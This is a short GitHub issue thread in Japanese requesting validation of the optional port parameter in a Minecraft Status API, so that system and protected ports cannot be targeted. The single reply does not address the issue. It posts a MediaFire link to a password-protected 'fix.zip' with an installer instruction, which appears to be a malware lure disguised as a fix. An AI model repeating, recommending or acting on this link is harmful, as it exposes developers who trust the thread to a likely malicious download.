### ISSUE TITLE
[feature] Minecraft Status API での Port 指定に validation を設ける

### ISSUE THREAD

**Issue by myosotis-dev** [TKYcraft/chisato#137]
## summary
- 現状 Minecraft Status API では optional で port 番号を指定できる
- システム port を含め保護するべき port を指定されると問題があるため、何らかの validation を行う必要がある。

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
